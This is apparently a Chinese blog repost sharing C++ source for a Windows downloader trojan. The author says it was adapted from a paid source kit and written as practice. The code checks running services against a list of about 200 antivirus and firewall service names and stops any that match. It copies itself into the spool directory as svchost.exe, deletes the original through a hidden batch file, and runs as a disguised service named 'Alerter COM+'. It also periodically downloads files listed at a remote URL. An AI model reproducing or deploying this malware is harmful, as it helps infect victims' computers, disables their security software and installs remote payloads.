VC 下载者

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|注意事项：如欲转载，请保留以下信息。谢谢
|文章出处：http://hi.baidu.com/_wang8
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
上周朋友给了一套教主的vip个人源代码，于是根据需求敲敲打打改成这样。
感叹教主的确出是同类软件中的精品。
在隐藏与保护方面还是打算从驱动来做，同时常规穿墙部分因为代码太多没
有进程注入。当作练习

// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "winsvc.h"

#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")

#include "time.h"

#include "urlmon.h"
#pragma comment(lib,"urlmon.lib")

#include <tlhelp32.h>

/
struct MODIFY_DATA
{
char DownFile[128];//下载文件列表
int WaitTime;//巡查时间（分钟）
}modify_data =
{
"http://www.baidu.com/tmp.txt",
    60,//间隔检测时间xx分钟
};

HWND hWnd;
char DownFileDate1[9]="00-00-00";
char DownFileDate2[9]="00-00-00";

SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;

char test[128];

char AntiServ[193][18] ={
"ACKWIN32",
"ADVXDWIN",
"ALERTSVC",
"ALOGSERV",
"AMON9X",
"ANTI-TROJAN",
"ANTS",
"apvxdwin",
"ATCON",
"ATUpdateR",
"ATWATCH",
"AUTODOWN",
"AutoTrace",
"AVCONSOL",
"AVGCC32",
"AVGCTRL",
"Avgctrl",
"AVGSERV",
"AvgServ",
"AVGSERV9",
"AVGW",
"avkpop",
"AVKSERV",
"avkservice",
"avkwctl9",
"AVP32",
"AVP32",
"AVPCC",
"AVPCC",
"AVPM",
"AVPM",
"Avsched32",
"AVSYNMGR",
"AvSynMgr",
"AVWINNT",
"AVXMONITOR9X",
"AVXMONITORNT",
"AVXQUAR",
"AVXW",
"BLACKD",
"BLACKICE",
"BlackICE",
"CLAW95",
"CLAW95CF",
"CLEANER",
"CLEANER3",
"CMGRDIAN",
"CONNECTIONMONITOR",
"defscangui",
"DEFWATCH",
"DOORS",
"DVP95",
"EFPEADM",
"ETRUSTCIPE",
"EVPN",
"EXPERT",
"fameh32",
"fch32",
"fih32",
"fnrb32",
"fsaa",
"fsav32",
"fsgk32",
"fsm32",
"fsma32",
"fsmb32",
"gbmenu",
"GENERICS",
"GUARD",
"GUARDDOG",
"HELP",
"IAMAPP",
"IAMSERV",
"ICLOAD95",
"ICLOADNT",
"ICMON",
"ICSUPP95",
"ICSUPPNT",
"IFACE",
"IOMON98",
"ISRV95",
"JEDI",
"LDNETMON",
"LDPROMENU",
"LDSCAN",
"LOCKDOWN",
"LOCKDOWN2000",
"LUALL",
"LUCOMSERVER",
"MCAGENT",
"MCMNHDLR",
"MCSHIELD",
"McShield",
"MCTOOL",
"MCUpdate",
"MCVSRTE",
"MCVSSHLD",
"MGAVRTCL",
"MGAVRTE",
"MGHTML",
"minilog",
"MONITOR",
"MOOLIVE",
"MWATCH",
"NAVAP",
"navapsvc",
"NAVAPW32",
"NAVENG",
"NAVEX15",
"NAVLU32",
"NAVW32",
"NAVWNT",
"NDD32",
"NeoWatchLog",
"NETUTILS",
"ngdbserv",
"NGServer",
"NISSERV",
"NISSERV",
"NISUM",
"NISUM",
"NMAIN",
"NORMIST",
"NPROTECT",
"NPSSVC",
"NSCHED32",
"ntrtscan",
"NTVDM",
"NTXconfig",
"NVC95",
//"NVSVC32",
"NWService",
"NWTOOL16",
"PADMIN",
"pavproxy",
"PCCIOMON",
"pccntmon",
"pccwin97",
"PCCWIN98",
"pcscan",
"PERSFW",
"POP3TRAP",
"POPROXY",
"PORTMONITOR",
"PROCESSMONITOR",
"PROGRAMAUDITOR",
"PROT95",
"PVIEW95",
"RAV7",
"RAV7WIN",
"REALMON",
"RESCUE",
"RTVSCN95",
"sbserv",
"SCAN32",
"SCRSCAN",
"sharedaccess",
"SPHINX",
"SPYXX",
"SS3EDIT",
"STOPW",
"SVW3",
"SWEEP95",
"SweepNet",
"SWEEPSRV",
"SWEEPSRV.SYS",
"SweepUpdate",
"SWNETSUP",
"SymProxySvc",
"SYMTRAY",
"TFAK",
"vbcmserv",
"VbCons",
"VET32",
"VET95",
"VETTRAY",
"VPC32",
"VPTRAY",
"VSCHED",
"VSECOMR",
"VSHWIN32",
"VSMAIN",
"vsmon",
"VSMON",
//"VSSTAT",
"WATCHDOG",
"WEBSCANX",
"WGFE95",
"WIMMUN32",
"WRADMIN",
"WRCTRL",
"ZAPROMINILOG",
"ZONEALARM"

};
//====================================================================
void KillProcess(char * processName)
{
HANDLE   hSnapshot;   
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32   pe;   
Process32First(hSnapshot,&pe);   
do   
{    CString KillProcessName = processName;
        if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
   {   
    HANDLE   hProcess;   
    hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);   
    if(hProcess)   
    {   
     TerminateProcess(hProcess,0);//关闭进程   
    }   
   }   
}     
while(Process32Next(hSnapshot,&pe));   
CloseHandle(hSnapshot);
}

//
//终止服务
void StopServices(char * SvrName)
{
CString name = SvrName;//变量转移
SC_HANDLE scm;
SC_HANDLE service;
SERVICE_STATUS status;

if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL)
{
   //printf("OpenSCManager Error/n");
   return;
}
service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE);
if (!service)
{
   //printf("OpenService error!/n");
   return;
}
BOOL isSuccess=QueryServiceStatus(service,&status);
if (!isSuccess)
{
   //printf("QueryServiceStatus error!/n");
   return;
}
if ( status.dwCurrentState!=SERVICE_STOPPED )
{
  
   isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status);
   //if (!isSuccess )
   // printf("服务停止失败!/n");
   //else
   // printf("服务停止成功!/n");
   Sleep( 500 );
  
}else
{
   //printf("此服务没有运行!/n");
}

}

BOOL DisplayServices()
{

LPENUM_SERVICE_STATUS lpServices = NULL;
DWORD   nSize = 0;
DWORD   nServicesReturned;
DWORD   nResumeHandle = 0;
DWORD dwServiceType = SERVICE_WIN32;

SC_HANDLE schSCManager = NULL;
BOOL Flag = FALSE;
DWORD   i = 0;
UINT j = 0;

schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);


if (schSCManager == NULL) // Fail To Open SCM
{
   //printf("Fail To Open SCM/n");
   return FALSE;
}

lpServices = (LPENUM_SERVICE_STATUS) LocalAlloc(LPTR, 64 * 1024); // Allocate Ram

if (lpServices == NULL) // Fail To Allocate Ram
{
   //printf("Fail To Allocate Ram/n");
   goto CleanUP;
}

// Enum All Service Based On Service Type
if (EnumServicesStatus(schSCManager,
   dwServiceType,
   SERVICE_STATE_ALL,
   (LPENUM_SERVICE_STATUS)lpServices,
   64 * 1024,
   &nSize,
   &nServicesReturned,
   &nResumeHandle) == NULL)
{
   //printf("Fail To Enum Service/n");
   goto CleanUP;
}

// Display The Services
//这里进行服务名称对比,如果是则终止
//printf("%-34s%s/n/n","ServiceName","DisplayName");
for (i = 0; i < nServicesReturned; i++)
{
  
   //printf("%s/n",lpServices[i].lpServiceName); //从中进行匹配
   for(int j = 0 ; j < 190;j++)
   {
    if(!_strnicmp(lpServices[i].lpServiceName,AntiServ[j],strlen(lpServices[i].lpServiceName)))
    {
     //printf("FindServer:%s/n",lpServices[i].lpServiceName);
     if (lpServices[i].ServiceStatus.dwCurrentState == SERVICE_RUNNING)
     {
      //printf("STOPServer:%s/n",lpServices[i].lpServiceName);
      StopServices(lpServices[i].lpServiceName);
     }
    }
   
   }
  
}
Flag = TRUE;

// Close Service Handle,Free Allocated Ram And Return To The Caller
CleanUP:
CloseServiceHandle(schSCManager);
if (lpServices != NULL)
{
   LocalFree(lpServices);
}

getchar ();

return Flag;

}

//

unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{
while(1)
{
   //MessageBox(NULL,"STOP SERVER","TODO",MB_OK);
   ///先对服务进行一次扫描检测，如果有不对的就停止。只针对WIN32
   DisplayServices();

   if(GetDownFileDate(modify_data.DownFile,DownFileDate2))//将要下载列表文件的时间存于Date2
   {
    if (strncmp(DownFileDate1,DownFileDate2,8)!=0)//下载列表时间不一样
    {//表示需要下载文件
     DownFiles(modify_data.DownFile);//下载文件列表中所有文件
     //DownExec(modify_data.DownFile);//下载文件
     strcpy(DownFileDate1,DownFileDate2);
    }
   }
   Sleep(modify_data.WaitTime*60*1000);//分钟一次
}

return 0;
}

//***********************************************//自删除
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s//rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
   WriteFile(f,"@echo off/r/n"
    ":kill/r/n"
    "attrib -a -r -s -h /"%1/"/r/n"
    "del /F /"%1/"/r/n"
    "if exist /"%1/" goto kill/r/n"
    "del /F /"%0/"/r/n"
    ,94, &r,NULL
    );
   CloseHandle(f);

  
   memset(&sinfo, 0, sizeof(STARTUPINFO));
   sinfo.cb = sizeof(sinfo);
   sinfo.wShowWindow = SW_HIDE;
   memset(This_File,0,sizeof(This_File));
   GetModuleFileName(NULL, This_File, sizeof(This_File));
   sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
   ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
  
   // execute the batch file
   CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
}
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;

///自复制----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"//spool//svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));

if (_stricmp(This_File,filename)!=0)
{
   DeleteFile(filename);
   if(::CopyFile(This_File,filename,FALSE)==0) return -1;
   PROCESS_INFORMATION pinfo;
   STARTUPINFO sinfo;  
   memset(&pinfo,0,sizeof(pinfo));
   memset(&sinfo,0,sizeof(sinfo));
   CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
   uninstall();
   ExitProcess(0);
}

//注释解密部分,单元测试需要去掉，没有加密
//DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"4321");

//服务入口表-----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; //线程名字
service_tab_entry[0].lpServiceProc=ServiceMain; //线程入口地址
//可以有多个线程，最后一个必须为NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
    
if (StartServiceCtrlDispatcher(service_tab_entry)==0)//首次运行
{
   InstallService();
}
  
return nRetCode;
}

/***********************************************/